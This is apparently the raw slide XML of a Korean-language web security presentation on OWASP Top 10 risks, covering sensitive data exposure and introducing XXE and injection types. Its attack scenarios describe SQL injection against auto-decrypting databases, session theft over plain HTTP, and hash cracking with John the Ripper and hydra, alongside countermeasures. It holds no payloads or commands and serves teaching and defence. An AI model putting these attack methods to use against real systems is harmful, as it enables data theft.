      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288858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1026" name="Picture 2" descr="C:\Users\Administrator\Downloads\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42" y="2085704"/>
            <a:ext cx="1343296" cy="13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ownloads\dat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46" y="2085704"/>
            <a:ext cx="1343296" cy="13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13" y="4828904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70817" y="2612582"/>
            <a:ext cx="4685211" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200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770817" y="3013196"/>
            <a:ext cx="4685211" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200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48940" y="3239589"/>
            <a:ext cx="0" cy="14369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2931842" y="3535680"/>
            <a:ext cx="2528433" cy="114082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096000" y="3448593"/>
            <a:ext cx="2891246" cy="122791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9232" y="3483435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Client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1228" y="3483435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Server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7978" y="2168441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통신과정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7978" y="6060317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Hacker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76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1026" name="Picture 2" descr="C:\Users\Administrator\Downloads\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60" y="2085704"/>
            <a:ext cx="1278452" cy="12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ownloads\dat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46" y="2085704"/>
            <a:ext cx="1343296" cy="13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13" y="4828904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770817" y="2612582"/>
            <a:ext cx="4685211" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200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770817" y="3013196"/>
            <a:ext cx="4685211" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200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48940" y="3239589"/>
            <a:ext cx="0" cy="14369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2931842" y="3535680"/>
            <a:ext cx="2528433" cy="114082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096000" y="3448593"/>
            <a:ext cx="2891246" cy="122791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8593801" y="1942042"/>
            <a:ext cx="2516777" cy="1584960"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB9D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취약한 암호화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7978" y="2168441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통신과정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="타원 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188570" y="1942042"/>
            <a:ext cx="3120740" cy="1584960"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB9D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평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 노출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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="타원 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001805" y="1942042"/>
            <a:ext cx="2516777" cy="1584960"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB9D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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화 정보 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>탈취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49232" y="3483435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Client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1228" y="3483435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Server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7978" y="6060317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Hacker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714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공격 시나리오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1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740345" y="2356022"/>
            <a:ext cx="2537254" cy="3748216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00518" y="2171356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OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1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135760" y="2953265"/>
            <a:ext cx="1746423" cy="2553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Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목 Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호화된 데이터</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 3" descr="C:\Users\Administrator\Downloads\da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8" y="3416836"/>
            <a:ext cx="1626590" cy="16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965622" y="3863549"/>
            <a:ext cx="3871783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53016" y="3410468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SQL Injection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7911535" y="3968493"/>
            <a:ext cx="1087394" cy="523276"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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dministrator\Downloads\cogwhe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53" y="3739078"/>
            <a:ext cx="982107" cy="9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582021" y="4790989"/>
            <a:ext cx="141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경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>검색시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>복호화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 된 데이터 반환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949148" y="4521688"/>
            <a:ext cx="3888257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3059" y="4709514"/>
            <a:ext cx="1416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경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>데이터 노출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1958" y="1919416"/>
            <a:ext cx="6670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애플리케이션은 자동화된 데이터 베이스 암호화를 사용하여 정보를 암호화 합니다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그러나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이 데이터들은 검색될 때 자동으로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복호화되므로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SQL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인젝션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등의 결함으로 의도하지 않은 정보들이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평문으로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노출될 수 있습니다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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="a고딕15" pitchFamily="18" charset="-127"/>
              <a:ea typeface="a고딕15" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29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6" y="4863119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89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공격 시나리오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2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1958" y="1919416"/>
            <a:ext cx="718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모든 웹 페이지에서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SSL/TLS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를 반드시 사용하지 않거나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약한 암호화를 지원하는 사이트에 대해서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공격자가 네트워크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패킷을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가로채었을 때 쉽게 개인정보를 모니터링하고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세션 쿠키 탈취 등을 통해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2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차 공격으로 이어질 수 있습니다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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3" descr="C:\Users\Administrator\Downloads\da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8" y="3589834"/>
            <a:ext cx="1626590" cy="16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73" y="3801602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ownloads\databa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433" y="3763903"/>
            <a:ext cx="1452521" cy="14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02150" y="3220998"/>
            <a:ext cx="1046206" cy="36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Client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16591" y="3141159"/>
            <a:ext cx="104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WEB Server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75006" y="4176587"/>
            <a:ext cx="2776151" cy="537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516130" y="4176587"/>
            <a:ext cx="2846090" cy="537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셈 기호 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461926" y="3911138"/>
            <a:ext cx="789611" cy="544239"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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1122" y="3998839"/>
            <a:ext cx="1046206" cy="36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HTTPS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96433" y="3992706"/>
            <a:ext cx="1046206" cy="36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HTTP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875006" y="4587591"/>
            <a:ext cx="6487215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96433" y="4403173"/>
            <a:ext cx="1046206" cy="36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HTTP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5" name="폭발 1 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674448" y="4403129"/>
            <a:ext cx="1561595" cy="910276"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="CB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OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>세션탈취</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="폭발 1 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916729" y="3264488"/>
            <a:ext cx="1561595" cy="910276"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="CB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OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>정보유출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32" y="5443206"/>
            <a:ext cx="2921085" cy="8587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H="1" flipV="1">
            <a:off x="6224121" y="4990055"/>
            <a:ext cx="473406" cy="652864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 flipV="1">
            <a:off x="6516132" y="4858269"/>
            <a:ext cx="2537252" cy="71069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75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공격 시나리오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3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959" y="1919416"/>
            <a:ext cx="6897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패스워드를 저장할 때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솔트를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사용하지 않거나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취약한 해시를 사용하는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DB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는 레인보우테이블 공격에 쉽게 노출될 수 있습니다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="a고딕15" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕15" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>솔트를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 사용했더라도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취약한 해시를 사용한 경우에는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GPU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를 이용한 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Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="a고딕15" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕15" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격에 쉽게 무력화됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="a고딕15" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕15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6367" y="3141159"/>
            <a:ext cx="104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WEB Server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pic>
        <p:nvPicPr>
          <p:cNvPr id="11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06" y="3801602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7998768" y="3218151"/>
            <a:ext cx="3616411" cy="23699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Administrator\Downloads\database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974" y="3932505"/>
            <a:ext cx="1165826" cy="11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681433" y="3494011"/>
            <a:ext cx="1416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경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DATABASE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="C:\Users\Administrator\Downloads\databa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09" y="3763903"/>
            <a:ext cx="1452521" cy="14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ownloads\skull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54" y="3603268"/>
            <a:ext cx="1014185" cy="91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2895043" y="4028838"/>
            <a:ext cx="5815913" cy="1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96497" y="3668101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파일 업로드 취약점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107459" y="4669969"/>
            <a:ext cx="4699517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87546" y="4728999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취약한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hash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4" name="폭발 1 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711719" y="4235220"/>
            <a:ext cx="1561595" cy="910276"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="CB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경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>빵야</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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20316450">
            <a:off x="2776722" y="4976219"/>
            <a:ext cx="2034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John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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847332">
            <a:off x="4518667" y="4916492"/>
            <a:ext cx="100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hydra</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600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2785071" y="4669969"/>
            <a:ext cx="926648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05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보안대책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957" y="1919416"/>
            <a:ext cx="93853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애플리케이션에서 사용하는 데이터를 처리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저장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전송으로 분류합니다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  <a:b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</a:b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개인정보보호법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법률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업무 필요에 따라 어떤 데이터가 민감한지 파악하고 분류에 따라 통제합니다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불필요한 민감한 데이터는 저장하지 않습니다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모든 민감한 데이터들을 암호화하는지 확인합니다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최신의 강력한 표준 알고리즘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프로토콜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암호화 키를 사용하는지 확인하고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적합한 키 관리를 사용합니다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Perfect Forward Secrecy(PFS)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암호를 사용하는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TLS /</a:t>
            </a:r>
            <a:b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</a:b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HTTP Strict Transport Security(HSTS)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와 같은 </a:t>
            </a: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지시문을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 사용하여 암호화 통신이 진행되도록 보장합니다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민감한 데이터를 포함하는 응답 캐시를 비활성화합니다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  <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF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79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A4. XML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외부 개체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(XXE)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933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XML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외부 개체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(XXE)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A4:2017.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510423" y="3208635"/>
            <a:ext cx="1521104" cy="2718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81463" y="3713204"/>
            <a:ext cx="2754109" cy="3130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1957" y="3013501"/>
            <a:ext cx="9385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서비스에 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XML </a:t>
            </a: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업로드가 가능하며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XML</a:t>
            </a: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 문서에 취약한 코드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, </a:t>
            </a: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의존성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, </a:t>
            </a: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통합을 공격하는 악의적인 내용을 포함할 수 있다면 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF Bold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공격자는 취약한 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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>프로세스를 공격할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41734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XML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외부 개체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(XXE)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A4:2017.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1957" y="1853664"/>
            <a:ext cx="9385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XML( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>eXtensible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
                <a:ea typeface="경기천년제목OTF Bold" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> Markup Language)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마크업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 언어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(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태그 등을 이용하여 문서나 데이터의 구조를 명기하는 언어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인터넷에 연결된 시스템끼리 데이터를 쉽게 주고 받을 수 있게 하여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HTML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의 한계를 극복할 목적으로 만들어짐</a:t>
            </a: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HTML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처럼 데이터를 보여주는 목적이 아닌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데이터를 저장하고 전달할 목적으로만 만들어졌습니다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XML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태그는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HTML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태그처럼 미리 정의되어 있지 않고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사용자가 직접 정의할 수 있습니다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  <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="경기천년제목OTF Light" pitchFamily="18" charset="-127"/>
              <a:ea typeface="경기천년제목OTF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408209"/>
            <a:ext cx="5067300" cy="203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35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B65C5-23CB-496A-A71C-92652EBCC3F7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70A97-1824-4AC3-8602-CC1B0B64DD5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F805815-526C-4D41-AAC0-3B2BE0322612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="16200000">
            <a:off x="2939797" y="-776206"/>
            <a:ext cx="6208097" cy="9176280"/>
            <a:chOff x="4399235" y="1759419"/>
            <a:chExt cx="3483985" cy="4253558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10B4081-074C-43C3-94A6-B7281E94A430}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5935672" y="1759419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686" tIns="181291" rIns="161686" bIns="181291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 dirty="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7CEEB1-FB1F-4409-9B87-565DF6470C84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803185" y="1952973"/>
              <a:ext cx="1080035" cy="5806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7A20271-486B-4539-80B7-3CBAD2F9637A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5026352" y="1759419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161707"/>
                <a:satOff val="-9325"/>
                <a:lumOff val="959"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-161707"/>
                <a:satOff val="-9325"/>
                <a:lumOff val="959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31206" tIns="150811" rIns="131206" bIns="150811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200" kern="12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9FA655D-B7E4-43EC-B4A9-00F861BF84A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5479270" y="2580865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323414"/>
                <a:satOff val="-18651"/>
                <a:lumOff val="1917"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-323414"/>
                <a:satOff val="-18651"/>
                <a:lumOff val="1917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686" tIns="181291" rIns="161686" bIns="181291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 dirty="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E58145-65D0-4570-9B25-1CE15699367F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4399235" y="2774419"/>
              <a:ext cx="1045195" cy="5806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CB245B1-3712-4DB7-A2D4-017DD5945DFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6388590" y="2580865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485121"/>
                <a:satOff val="-27976"/>
                <a:lumOff val="2876"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-485121"/>
                <a:satOff val="-27976"/>
                <a:lumOff val="2876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31206" tIns="150811" rIns="131206" bIns="150811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200" kern="12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C48C79A-90EB-4160-9A6C-245B49601401}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5935672" y="3402311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646828"/>
                <a:satOff val="-37301"/>
                <a:lumOff val="3835"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-646828"/>
                <a:satOff val="-37301"/>
                <a:lumOff val="3835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686" tIns="181291" rIns="161686" bIns="181291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 dirty="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E9F1E7-2607-4CBE-9419-CD587C4F8354}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803185" y="3595866"/>
              <a:ext cx="1080035" cy="5806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5F4B125-EEC6-4D8E-9D89-9E136A629C8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5026352" y="3402311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808535"/>
                <a:satOff val="-46627"/>
                <a:lumOff val="4793"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-808535"/>
                <a:satOff val="-46627"/>
                <a:lumOff val="4793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31206" tIns="150811" rIns="131206" bIns="150811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200" kern="12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FDF1545-BC20-444C-9283-2F0C48A65E82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5479270" y="4223758"/>
              <a:ext cx="841964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970242"/>
                <a:satOff val="-55952"/>
                <a:lumOff val="5752"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-970242"/>
                <a:satOff val="-55952"/>
                <a:lumOff val="5752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686" tIns="181291" rIns="161687" bIns="181291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 dirty="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E110FB-58AA-4499-90AD-1CDA9CA61B73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4399235" y="4417312"/>
              <a:ext cx="1045195" cy="5806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990D507-12C2-41C9-A065-A546463258B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6388590" y="4223758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1131949"/>
                <a:satOff val="-65277"/>
                <a:lumOff val="6711"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1131949"/>
                <a:satOff val="-65277"/>
                <a:lumOff val="6711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31206" tIns="150811" rIns="131206" bIns="150811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200" kern="12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F4712B7-39A8-44DB-B388-BB772EC4156B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5967608" y="5045204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1293656"/>
                <a:satOff val="-74603"/>
                <a:lumOff val="7669"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1293656"/>
                <a:satOff val="-74603"/>
                <a:lumOff val="7669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686" tIns="181291" rIns="161686" bIns="181291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>
                  <a:latin typeface="a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                  <a:ea typeface="a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="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14ABCA8-6B24-475F-8132-52EF0CB9DFF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803185" y="5238759"/>
              <a:ext cx="1080035" cy="5806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2F95657-60E9-4285-8DB2-569D6356783A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5026352" y="5045204"/>
              <a:ext cx="841963" cy="967773"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 967773"/>
                <a:gd name="connsiteY0" fmla="*/ 420982 h 841963"/>
                <a:gd name="connsiteX1" fmla="*/ 210491 w 967773"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 841963"/>
                <a:gd name="connsiteX2" fmla="*/ 757282 w 967773"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 841963"/>
                <a:gd name="connsiteX3" fmla="*/ 967773 w 967773"/>
                <a:gd name="connsiteY3" fmla="*/ 420982 h 841963"/>
                <a:gd name="connsiteX4" fmla="*/ 757282 w 967773"/>
                <a:gd name="connsiteY4" fmla="*/ 841963 h 841963"/>
                <a:gd name="connsiteX5" fmla="*/ 210491 w 967773"/>
                <a:gd name="connsiteY5" fmla="*/ 841963 h 841963"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 967773"/>
                <a:gd name="connsiteY6" fmla="*/ 420982 h 8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7773" h="841963">
                  <a:moveTo>
                    <a:pt x="483886" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="967772" y="183127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="967772" y="658836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483886" y="841963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="658836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="183127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483886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31206" tIns="150811" rIns="131206" bIns="150811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200" kern="12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C93150-D0E3-4021-AF77-366358FDD341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1897682" y="3147059"/>
            <a:ext cx="122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SQL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858FC-9FB3-47AA-A678-F91C431D5829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1897682" y="4714890"/>
            <a:ext cx="122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LDAP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AACD9B-C625-4A85-A4E7-F121019B4EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3053292" y="2120666"/>
            <a:ext cx="2510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OS </a:t>
            </a:r>
          </a:p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interpreter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0C4341-9FA3-4B10-8DA6-48A300F64753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016246" y="3664888"/>
            <a:ext cx="2510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Program</a:t>
            </a:r>
          </a:p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invocation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="ko-KR" altLang="en-US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09E86A-EB9A-456D-8314-009CB10D7359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4840524" y="3185677"/>
            <a:ext cx="251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XML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BB85CF-6A9C-4BEA-8FD1-49845CA9A267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825795" y="4766448"/>
            <a:ext cx="251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HTML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C287B2-5D38-4ED2-8EE7-8CABB95477BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560490" y="2383829"/>
            <a:ext cx="251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JSON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D6016A-EAB3-4133-AA60-DCC71A6E165A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570952" y="3983303"/>
            <a:ext cx="251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HTTP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2EC8C-AE3D-407D-8AF6-1847F8A5A285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8332612" y="3162759"/>
